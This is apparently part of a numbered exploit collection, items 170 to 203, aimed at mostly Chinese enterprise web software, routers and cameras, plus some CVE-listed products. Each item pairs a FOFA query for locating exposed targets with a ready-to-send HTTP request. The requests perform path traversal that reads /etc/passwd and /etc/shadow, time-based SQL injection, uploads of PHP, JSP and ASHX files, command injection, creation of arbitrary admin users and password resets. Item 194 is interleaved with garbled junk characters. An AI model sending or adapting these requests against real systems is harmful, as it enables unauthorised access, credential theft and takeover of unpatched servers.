170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

8 x. C# w9 N5 t194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传1 K0 Q5 J5 J: L
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
4 Z V7 k- X9 @! E7 A# _7 _, R4 S7 \; y
POST /servlet/uploadAttachmentServlet HTTP/1.1
( @, X" H4 u. o* T6 b, \- m, B+ OHost: host( C( v# H( d% M5 I0 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
G9 \! u6 y: {' ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: R4 Q; c, O* k0 q/ a) [* VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# s; k& G' b- p r1 {, rAccept-Encoding: gzip, deflate/ `* F/ Y8 G/ z
Connection: close
# u4 B# W i4 |$ A$ FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk3 U# g0 e* q# @/ p# j0 B$ e& \
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 C3 {4 T4 h6 H8 f. x1 }5 O$ w2 D! |7 `, U! I: @
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"& j* u2 l9 S* p+ g
Content-Type: text/plain+ ^8 c' ]0 h) g
<% out.println("hello");%>) X |- V+ R6 n) C3 M
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
' a3 j s) m7 p5 ~+ _) u$ P# nContent-Disposition: form-data; name="json": B) B) o" u0 m, ]% z" I
{"iq":{"query":{"UpdateType":"mail"}}}
- f* u' g9 Y+ L8 q# k* Q------WebKitFormBoundaryKNt0t4vBe8cX9rZk--2 o( z& {- I- r
* V2 b7 }( H/ n) {% X; v6 u, d
195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload endpoint file upload
Fofa:title="Authenticate Please!"

1. Run the POC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--